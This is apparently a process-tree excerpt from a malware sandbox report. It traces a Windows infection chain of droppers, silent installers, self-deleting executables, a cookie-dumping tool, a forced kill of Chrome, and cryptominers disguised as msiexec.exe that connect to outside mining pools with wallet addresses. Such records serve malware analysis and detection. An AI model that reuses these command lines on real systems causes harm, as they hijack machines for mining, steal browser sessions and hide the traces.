C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:4488
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:4212
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:8956
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\m40onlyda2h\k5zx4u1mdos.exe"C:\Users\Admin\AppData\Local\Temp\m40onlyda2h\k5zx4u1mdos.exe"8⤵PID:5556
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\m40onlyda2h\k5zx4u1mdos.exe"9⤵PID:6088
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gxedel4cjs2\rhgumossgou.exe"C:\Users\Admin\AppData\Local\Temp\gxedel4cjs2\rhgumossgou.exe" /quiet SILENT=1 AF=7568⤵PID:5636
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gxedel4cjs2\rhgumossgou.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gxedel4cjs2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617184195 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5812
-
-
-
C:\Users\Admin\AppData\Local\Temp\0qezbd1obps\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\0qezbd1obps\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5748
-
C:\Users\Admin\AppData\Local\Temp\is-3JURO.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-3JURO.tmp\IBInstaller_97039.tmp" /SL5="$104B8,14574851,721408,C:\Users\Admin\AppData\Local\Temp\0qezbd1obps\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5880
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V6HEC.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:4892
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-V6HEC.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5080
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5PJTCYU2I5\setups.exe"C:\Users\Admin\AppData\Local\Temp\5PJTCYU2I5\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Users\Admin\AppData\Local\Temp\is-D3S67.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-D3S67.tmp\setups.tmp" /SL5="$501C0,635399,250368,C:\Users\Admin\AppData\Local\Temp\5PJTCYU2I5\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1344
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵PID:4532
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4680
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:4724
-
C:\Users\Admin\AppData\Roaming\15FA.tmp.exe"C:\Users\Admin\AppData\Roaming\15FA.tmp.exe"5⤵PID:4840
-
C:\Users\Admin\AppData\Roaming\15FA.tmp.exe"C:\Users\Admin\AppData\Roaming\15FA.tmp.exe"6⤵PID:4972
-
-
-
C:\Users\Admin\AppData\Roaming\17CF.tmp.exe"C:\Users\Admin\AppData\Roaming\17CF.tmp.exe"5⤵PID:4924
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4480
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:3468
-
-
-
C:\Users\Admin\AppData\Roaming\18CA.tmp.exe"C:\Users\Admin\AppData\Roaming\18CA.tmp.exe"5⤵PID:5040
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\18CA.tmp.exe6⤵PID:5676
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:5300
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:5620
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:5796
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:2476
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:8144
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:8636
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7052
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3848
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2344
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4308
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4944
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:652
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 63C52381FCF6FD067FD9086DEC250E71 C2⤵PID:5956
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 63E416889C3649D5BFC32532AE9C4ABE2⤵PID:4568
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8208
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8756
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\7356caaedb574e4ba91f3aa1dd87ae01 /t 8712 /p 82081⤵PID:7820
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:9080
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{450a419e-bfc5-0041-b2f8-6305f911c13d}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:6572
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"2⤵PID:1240
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7884
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7896